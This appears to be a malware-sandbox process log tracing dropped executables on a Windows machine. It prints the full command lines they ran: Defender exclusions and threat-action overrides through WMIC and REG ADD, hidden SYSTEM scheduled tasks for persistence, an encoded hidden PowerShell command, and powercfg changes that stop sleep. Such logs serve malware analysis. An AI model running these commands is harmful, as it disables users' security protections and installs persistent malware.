- Creates scheduled task(s)
PID:5296 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2512 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\heidiVCmtumpHAW6e\WFAhAmhGq1gP_X_914kc.exe"C:\Users\Admin\AppData\Local\Temp\heidiVCmtumpHAW6e\WFAhAmhGq1gP_X_914kc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4812 -
C:\Users\Admin\Documents\SimpleAdobe\pGQrSVf4_mIUyUtVNqNoton6.exeC:\Users\Admin\Documents\SimpleAdobe\pGQrSVf4_mIUyUtVNqNoton6.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\7zSD966.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2556 -
C:\Users\Admin\AppData\Local\Temp\7zSEB87.tmp\Install.exe.\Install.exe /odidPC "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4116 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:4176
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:4768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\gZfYynT.exe\" ZO /Pbsite_idADi 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3468 -
C:\Users\Admin\Documents\SimpleAdobe\wPomemXLiK3rq2QEvqS91crJ.exeC:\Users\Admin\Documents\SimpleAdobe\wPomemXLiK3rq2QEvqS91crJ.exe2⤵
- Executes dropped EXE
PID:5508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵PID:4052
-
C:\Users\Admin\Documents\SimpleAdobe\wPomemXLiK3rq2QEvqS91crJ.exe"C:\Users\Admin\Documents\SimpleAdobe\wPomemXLiK3rq2QEvqS91crJ.exe"3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:5816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Modifies data under HKEY_USERS
PID:5532
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4304
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2484
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3604
-
C:\Windows\SysWOW64\ifzhwuog\sqfngwrn.exeC:\Windows\SysWOW64\ifzhwuog\sqfngwrn.exe /d"C:\Users\Admin\Documents\SimpleAdobe\ABdncqG0qcBNNomxh8SNa7uR.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2412 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Windows security bypass
- Sets service image path in registry
- Drops file in System32 directory
PID:5916
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4996
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5596 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5724
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:5732
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:5740
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:5748
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5756
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:5900
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\gZfYynT.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\gZfYynT.exe ZO /Pbsite_idADi 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
PID:6060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5160
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5528
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1424
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5668
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1856
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4256
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2640
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:568
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2668
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2368
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4164
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5068
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:323⤵PID:504
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:324⤵PID:4080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:643⤵PID:4256
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:323⤵PID:2640
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:643⤵PID:4512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:323⤵PID:4224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:643⤵PID:4540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:323⤵PID:2540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:643⤵PID:1724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:323⤵PID:1524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:643⤵PID:5364
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:323⤵PID:4076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:643⤵PID:4436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5368
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3092
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:323⤵PID:2980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:643⤵PID:1584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:323⤵PID:704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:643⤵PID:5088
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giuXBPUzR" /SC once /ST 06:46:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4524 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giuXBPUzR"2⤵PID:4496
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giuXBPUzR"2⤵PID:3028
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 02:26:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\CCtCNtF.exe\" ob /Pksite_idueH 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qXnxKrbPbFSTFetyh"2⤵PID:5336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3012
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5420
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5264
-
